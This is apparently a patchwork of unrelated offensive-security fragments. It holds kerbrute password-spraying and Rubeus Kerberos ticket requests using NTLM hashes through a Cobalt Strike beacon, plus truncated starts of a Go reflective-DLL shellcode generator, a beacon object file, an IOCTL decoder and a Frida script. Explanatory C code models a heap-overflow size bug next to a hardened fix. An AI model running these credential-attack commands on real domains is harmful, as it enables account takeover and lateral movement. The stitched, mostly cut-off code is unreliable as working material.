With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a Rubeus build that includes the brute module:
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
package main
/*
Example Go program with multiple .NET binaries embedded.
This requires packr (https://github.com/gobuffalo/packr) and its CLI utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
package main
/*
 *
 * This is just a Go implementation of https://github.com/monoxgas/sRDI/
 * Useful if you're trying to generate shellcode for reflective DLL
 * injection in Go, otherwise probably not much use :)
 *
 * The project, shellcode, most comments within this project
 * are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas)
events {
    # nginx requires this section even when applying all default values
}
http {
    # The upstream keyword is followed by a name (a domain name/IP). This reference encapsulates
    # the list of backend servers defined for a virtual proxy. When authenticating
    # a certificate from a backend server, the upstream name is supplied to the
    # certificate authentication process instead of the backend server name. See
    # the comments associated with proxy_pass below for a detailed discussion.
#!/usr/bin/env python
from __future__ import print_function
import hashlib
import itertools
import os
import sys

__author__ = "Justin Lucas"
__email__ = "jlucas@ingressive.com"
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"

DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
import argparse
import sys

def auto_int(x):
    # argparse type helper: accepts decimal, hex (0x...) or octal (0o...) IOCTL codes
    return int(x, 0)

# Modded by Matteo 'uf0' Malvica - 2021
# The following code is taken from
# https://github.com/mwrlabs/win_driver_plugin/blob/master/win_driver_plugin/ioctl_decoder.py
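The decoder above is cut off before its logic. As an added example (not the script's own code, nor win_driver_plugin's), the following C program decodes an IOCTL code into the fields the Windows CTL_CODE macro packs (bits 31..16 DeviceType, 15..14 RequiredAccess, 13..2 FunctionCode, 1..0 TransferType) and re-encodes them. The sample codes are standard SDK values; the third code is constructed here to show a vendor-range device type with METHOD_NEITHER, the combination where the driver receives raw user pointers.

```c
/*
 * Added example: decode/encode Windows IOCTL codes the way CTL_CODE packs them.
 * Not the original script's code. The 0x8000 threshold is the start of the
 * vendor-defined device-type range documented for FILE_DEVICE_* values.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct ioctl_fields {
    uint32_t device_type;   /* FILE_DEVICE_* value, bits 31..16 */
    uint32_t access;        /* FILE_ANY_ACCESS / READ / WRITE / both, bits 15..14 */
    uint32_t function;      /* 12-bit function number, bits 13..2 */
    uint32_t method;        /* METHOD_BUFFERED .. METHOD_NEITHER, bits 1..0 */
};

/* Split a 32-bit IOCTL code into its four fields. */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Same packing as the SDK's CTL_CODE(DeviceType, Function, Method, Access). */
uint32_t ctl_code(uint32_t device_type, uint32_t function, uint32_t method, uint32_t access)
{
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

const char *method_name(uint32_t m)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[m & 3];
}

const char *access_name(uint32_t a)
{
    static const char *names[] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                                   "FILE_WRITE_ACCESS",
                                   "FILE_READ_ACCESS|FILE_WRITE_ACCESS" };
    return names[a & 3];
}

/* Device types 0x8000 and above are reserved for vendors: a quick tell that a
 * code belongs to a third-party driver rather than a Microsoft device class. */
int is_vendor_defined(uint32_t code)
{
    return decode_ioctl(code).device_type >= 0x8000;
}

/* METHOD_NEITHER hands the driver unvalidated user-mode pointers, so these
 * codes are the first ones to look at when auditing a driver's dispatch. */
int is_method_neither(uint32_t code)
{
    return decode_ioctl(code).method == 3;
}

void print_ioctl(uint32_t code)
{
    struct ioctl_fields f = decode_ioctl(code);
    printf("0x%08X: device 0x%04X function 0x%03X %s %s%s\n", code,
           f.device_type, f.function, method_name(f.method), access_name(f.access),
           is_vendor_defined(code) ? " (vendor-defined device type)" : "");
}

int main(void)
{
    print_ioctl(0x00070000);  /* IOCTL_DISK_GET_DRIVE_GEOMETRY: FILE_DEVICE_DISK (7), function 0 */
    print_ioctl(0x002D1400);  /* IOCTL_STORAGE_QUERY_PROPERTY: device 0x2D, function 0x500 */
    print_ioctl(ctl_code(0x8000, 0x801, 3, 0));  /* constructed vendor-style code, METHOD_NEITHER */
    return 0;
}
```

Feeding the decoder a list of codes pulled from a driver's dispatch routine and sorting by `is_method_neither` and `access == FILE_ANY_ACCESS` is the usual first triage step.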
import frida
import sys

def on_message(message, data):
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
        print(message)
/*
The vulnerable function takes as input an array of bytes and outputs their hex representation as a UTF-16 (wide-character) string. The hex-encoded bytes are separated by a space (0x20).
For example:
user input : 0 129
output buffer (vulnerable_chunk): 30 00 30 00 20 00 38 00 31 00 20 00
Regarding the vulnerability itself, the problem is in the output buffer (vulnerable_chunk) size calculation:
vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
The modulo truncates the required size to 16 bits: each input byte needs 6 output bytes, so from 10923 input bytes onward (10923*6 = 65538) the buffer is allocated far smaller than what the encoder writes into it.
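To make the size calculation concrete, here is an added example (not the project's code) that models the calculation as written on the page, finds the first input length at which it under-allocates, and places a hardened size computation and a bounds-checked encoder beside it. Assumptions not stated on the page: user_controlled_size is an unsigned 32-bit value, and the encoder writes uppercase hex digits (the page's example contains only numerals, so the case is not observable).

```c
/*
 * Added example, not the original project's code: the vulnerable size
 * calculation from the page, the encoder it feeds, and a hardened replacement.
 * Assumed: user_controlled_size is uint32_t; hex digits are uppercase.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* "XX " per input byte as UTF-16LE: three code units of two bytes = 6 bytes. */
#define OUT_BYTES_PER_INPUT 6u

/* The calculation from the page: 32-bit multiply, then reduced modulo 65536,
 * which silently truncates the real requirement to 16 bits. */
uint32_t vulnerable_chunk_size(uint32_t user_controlled_size)
{
    return (user_controlled_size * OUT_BYTES_PER_INPUT) % 65536u;
}

/* Bytes the encoder actually writes for n input bytes. */
uint64_t bytes_written(uint32_t n)
{
    return (uint64_t)n * OUT_BYTES_PER_INPUT;
}

/* 1 when the allocation is smaller than what will be written into it. */
int is_undersized(uint32_t n)
{
    return bytes_written(n) > vulnerable_chunk_size(n);
}

/* Smallest input length that turns the truncation into a heap overflow. */
uint32_t first_overflowing_length(void)
{
    uint32_t n = 0;
    while (!is_undersized(n))
        n++;
    return n;
}

/* Hardened replacement: widen before multiplying, no modulo, and reject
 * anything above a caller-chosen limit. Returns 0 when the request must be
 * refused, otherwise the exact number of bytes to allocate. */
size_t safe_chunk_size(uint32_t n, size_t limit)
{
    uint64_t need = (uint64_t)n * OUT_BYTES_PER_INPUT;
    if (need == 0 || need > limit)
        return 0;
    return (size_t)need;
}

/* Bounds-checked encoder producing the page's output format.
 * Returns bytes written, or 0 if out is too small for n input bytes. */
size_t hex_encode_utf16le(const uint8_t *in, size_t n, uint8_t *out, size_t out_len)
{
    static const char digits[] = "0123456789ABCDEF";
    if (n > SIZE_MAX / OUT_BYTES_PER_INPUT || n * OUT_BYTES_PER_INPUT > out_len)
        return 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t *p = out + i * OUT_BYTES_PER_INPUT;
        p[0] = (uint8_t)digits[in[i] >> 4];  p[1] = 0;   /* high nibble, UTF-16LE */
        p[2] = (uint8_t)digits[in[i] & 0xF]; p[3] = 0;   /* low nibble */
        p[4] = ' ';                          p[5] = 0;   /* separator (0x20) */
    }
    return n * OUT_BYTES_PER_INPUT;
}

/* Reproduces the page's example: input bytes 0 and 129 must encode to
 * 30 00 30 00 20 00 38 00 31 00 20 00. Returns 1 on match. */
int encode_example_matches(void)
{
    const uint8_t in[2] = { 0, 129 };   /* constructed sample input from the page's example */
    const uint8_t expected[12] = { 0x30,0, 0x30,0, 0x20,0, 0x38,0, 0x31,0, 0x20,0 };
    uint8_t out[12];
    return hex_encode_utf16le(in, 2, out, sizeof out) == sizeof out
        && memcmp(out, expected, sizeof out) == 0;
}

int main(void)
{
    uint32_t n = first_overflowing_length();
    printf("input length %u: allocates %u bytes, writes %llu bytes\n",
           n, vulnerable_chunk_size(n), (unsigned long long)bytes_written(n));
    printf("safe_chunk_size(%u) = %zu\n", n, safe_chunk_size(n, 1u << 20));
    printf("example encoding matches page: %d\n", encode_example_matches());
    return 0;
}
```

The program only computes the sizes; it never performs the overflowing write. The hardened version also shows why a modulo is never a substitute for a limit check: the correct fix rejects oversized requests explicitly rather than wrapping them.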